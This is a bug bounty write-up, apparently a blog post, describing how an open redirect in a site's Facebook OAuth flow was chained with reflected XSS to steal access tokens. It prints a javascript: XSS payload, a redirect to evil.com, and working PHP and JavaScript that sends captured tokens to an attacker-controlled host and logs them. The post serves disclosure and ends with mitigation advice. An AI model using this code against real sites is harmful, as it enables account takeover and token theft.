Open Redirect > XSS > to Stealing Facebook Token

3 years ago 297
BOOK THIS SPACE FOR AD
ARTICLE AD

Bagas Rizki Gunardi

Hello Folks,
This is my first blog for sharing about bug bounty hunting. Here I’m hunting for private programs so I won’t leak the name of the program. Because I’m still learning how this website works. I explore it without Burp suite, so all I did was explore like an ordinary person opening a website, logging in to an account, uploading photos, viewing blogs on the website, etc.

After bit exploring, I found the user account can connect to Facebook and LinkedIn. When I click it, it show the url like this:

https://redacted.com/oauth2/facebook?redirect_url=https://redacted.com/oauth2/facebook?redirect_url=https://www.facebook.com/dialog/oauth?client_id=xxxxx&redirect_uri=https%3A%2F%2Fredacted.com%2Foauth2%2Ffacebook&response_type=code&scope=email&display=popup&state=xxxxx

Because I found redirect_url parameter so I try for Open Redirect vulnerability https://redacted.com/oauth2/facebook?redirect_url=http://evil.com and it works. But the program said they not accept Open Redirect vulnerability if it can’t proof sensitive action. So I thinking, how about reflected XSS ? It is on redirect_url parameter so the Javascript code should look like this:

<script>location: "http://url.com";</script>

I tried simple payload XSS for location, javascript:alert(document.domain)

Reflected XSS fired

BOOM!

Reflected XSS fired, I want to report it immediately but there is a blog stop me to just report XSS. Because previously I searched “open redirect on facebook oauth” on google and found this blog https://abdilahrf.github.io/bugbounty/open-redirect-account-takeover-pada-bukalapak-com

I studied first how Abdillah Muhammad (The author) how he can stealing facebook oauth2 token with just open redirect. After understanding it, I don’t have a website so I made one at https://www.000webhost.com

I put 3 file in my website:

index.php<?php
header("Location:https://www.facebook.com/v3.0/dialog/oauth?client_id=xxxxx&redirect_uri=https://redacted.com/oauth2/facebook?redirect_url=https://xxxxx.000webhostapp.com/steal.html&response_type=token&scope=email");
?>
steal.html<h2>hack</h2>
<script>
let token = window.location.hash.slice(1);
const Http = new XMLHttpRequest();
const url='https://xxxxx.000webhostapp.com/save.php?data='+token;
Http.open("GET", url);
Http.send();
Http.onreadystatechange=(e)=>{
console.log(Http.responseText)
}
</script>
<meta http-equiv="refresh" content="1; url=https://redacted.com" />
save.php (For save token to specific path.)<?php
$file = fopen("token.txt","a");
If(isset($_GET['data'])){
fwrite($file,$_GET['data']);
fclose($file);
}
?>

After everything is prepared, it’s time to act. The final payload is:

https://redacted.com/oauth2/facebook?redirect_url=https://xxxxx.000webhostapp.com/steal.html&response_type=token&scope=email

https://developers.facebook.com/tools/debug/accesstoken/?access_token=TOKEN_HERE&version=v3.2

Mitigation

To prevent this vulnerability, you can whitelist the redirect url or change the configuration of the Facebook application so that it only accepts certain domains to receive callback tokens from oauth, and don’t use the wildcard on url.

Read Entire Article